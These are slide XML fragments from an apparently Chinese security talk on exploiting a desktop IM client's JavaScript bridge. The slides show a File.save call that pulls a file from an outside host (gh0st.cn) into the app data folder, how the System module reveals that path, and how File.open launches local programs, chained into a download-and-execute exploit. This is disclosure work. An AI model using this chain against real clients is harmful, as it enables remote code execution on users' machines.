                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>ZxDesktop.require("File").save({</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>"url": "http://gh0st.cn:81/test.txt"</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>,"name": "test.txt","path": "","chunkSize": "","size": "","fileData": ""});</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="9" name="直线箭头连接符 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E973C1DA-FE1F-7157-1A71-00957B36982A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3780539" y="4167984"/>
              <a:ext cx="391134" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="38100">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
              <a:tailEnd type="triangle"/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="3">
              <a:schemeClr val="accent4"/>
            </a:lnRef>
            <a:fillRef idx="0">
              <a:schemeClr val="accent4"/>
            </a:fillRef>
            <a:effectRef idx="2">
              <a:schemeClr val="accent4"/>
            </a:effectRef>
            <a:fontRef idx="minor">
              <a:schemeClr val="tx1"/>
            </a:fontRef>
          </p:style>
        </p:cxnSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="文本框 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{33252B85-5943-F45D-A2D4-84AF581498A8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="131386" y="1924484"/>
              <a:ext cx="3059983" cy="338554"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>File</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>模块存在</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>save</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>、</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>saveAs</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>方法。</a:t>
              </a:r>
              <a:endParaRPr lang="en-US"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56AF7E06-6182-7408-DB19-A805199CCEF5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="8077153" y="4123948"/>
              <a:ext cx="3941711" cy="633901"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="文本框 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94C423A2-6C89-9513-4C86-BC40C9CD1EBE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8035404" y="5021265"/>
              <a:ext cx="3941711" cy="584775"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">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文件下载落地在用户</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>IM</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>App</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>数据目录下的</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>null</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>文件夹。</a:t>
              </a:r>
              <a:endParaRPr lang="en-US"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15" name="图片 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B8D5AF7-08D3-40BF-7645-DFA5D984DE55}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="4222750" y="2366817"/>
              <a:ext cx="3746500" cy="3286297"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="文本框 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1280169A-A3B1-4D90-B73C-A2E56B73E3D6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4151034" y="1923263"/>
              <a:ext cx="3059983" cy="338554"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">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直接请求目标下载文件。</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600"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705083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a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" charset="-122"/>
                <a:cs typeface="Microsoft YaHei" charset="-122"/>
              </a:rPr>
              <a:t>IM</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" charset="-122"/>
                <a:cs typeface="Microsoft YaHei" charset="-122"/>
              </a:rPr>
              <a:t>客户端应用</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合 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2889E498-E2FE-C513-0C4F-B604263994D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="230123" y="2056265"/>
            <a:ext cx="11863402" cy="4066903"/>
            <a:chOff x="230123" y="1929851"/>
            <a:chExt cx="11863402" cy="4066903"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="图片 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3631FB3E-A8E1-32C2-46A5-8543AB949D32}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="330007" y="2422540"/>
              <a:ext cx="4038147" cy="1883337"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="文本框 18">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{906605EE-F878-ED60-B8ED-DE657F40D8E7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="230123" y="1929851"/>
              <a:ext cx="4318244" cy="338554"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>System</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>模块存在</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>userDataPath</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>、</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>dbPath</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>成员。</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>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C98FA679-9B2E-2868-AD1F-19534682BA16}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="242355" y="4454028"/>
              <a:ext cx="4038147" cy="584775"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">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可以获取用户</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>App</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>数据目录，加上</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>”null/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>下载文件名</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>.</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>后缀名</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>”</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>即可构建完整的路径。</a:t>
              </a:r>
              <a:endParaRPr lang="en-US"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21" name="图片 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B71D0F16-214A-B103-D6BB-DB7733957690}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="4777370" y="2387370"/>
              <a:ext cx="3717824" cy="1019099"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="文本框 21">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B273AA5-C460-FB32-4776-D892FCB8F756}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4687724" y="1964881"/>
              <a:ext cx="3518980" cy="338554"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>File</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>模块存在</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>open</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>方法。</a:t>
              </a:r>
              <a:endParaRPr lang="en-US"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23" name="图片 22">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A84232D8-9220-F868-BAA8-5B9A318D4A5B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="4777370" y="3911653"/>
              <a:ext cx="3717824" cy="1708813"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="文本框 23">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{776A4761-245D-58EE-7233-6C838BB2DD04}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4683241" y="3543708"/>
              <a:ext cx="3518980" cy="338554"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">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可以直接打开本地文件，如</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>calc.exe</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>。</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>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317056F6-D51D-10E7-7A31-A559161ED5BB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8755415" y="1964881"/>
              <a:ext cx="3338110" cy="4031873"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">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组合拳</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>Exploit</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>：</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
